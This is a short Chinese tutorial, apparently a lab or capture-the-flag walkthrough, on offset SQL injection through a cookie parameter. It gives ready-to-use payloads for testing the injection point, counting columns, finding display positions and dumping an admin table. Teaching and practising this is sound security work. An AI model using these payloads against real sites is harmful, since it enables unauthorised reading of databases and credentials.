偏移注入简介

使用场景

一些无法查询的列名，比如权限不足的 知道表名却不知道字段 使用偏移查询主要查询字段及内容等。

使用条件

（1）：知道表名

（2）：注入点的字段数必须要大于查询的字段

常见问题

1 .* 的作用

用于代替表内全部字段，在不能用系统自带库查字段名时。

2.偏移注入是否仅用于Access

不是，mysql也可以使用偏移注入。

3.偏移注释时联合查询后的一张表为什么要小于前一张表

联合查询必须要满足一个条件，就是前面的查询和后面的查询字段数必须相等，因为前面那张表的查询字段数是固定的，后面那张我们控制，但是当你使用admin.* 代表admin整个表的字段，如果admin表字段比前面那个表多，就不符合联合查询。

偏移注入实战

1.判断注入点

document.cookie="ID="+escape("105 and 1=1") 页面显示正常

document.cookie="ID="+escape("105 and 1=2") 页面显示错误

存在 注入。

2. 判断当前页面字段总数

document.cookie="ID="+escape("105 and 1=1 order by 26")  页面显示正常

document.cookie="ID="+escape("105 and 1=1 order by 27")  页面显示错误

==》当前页面字段数为 26。

3.爆破表名

在前面已经爆破出了表名 admin          Access注入之Cookie注入

4.判断显示位

document.cookie="ID="+escape("105 and 1=2 union select 1121212,2121212,3121212,4121212,5121212,6121212,7121212,8121212,9121212,10121212,11121212,12121212,13121212,14121212,15121212,16121212,17121212,18121212,19121212,20121212,21121212,22121212,23121212,24121212,25121212,26121212 from admin")

得到显示位 3，5，7，25。

5.查字段内容

document.cookie="ID="+escape("105 and 1=2 union select 1,2,3,4,5,6,7,8,9,admin.*,10  from admin"

得到FALG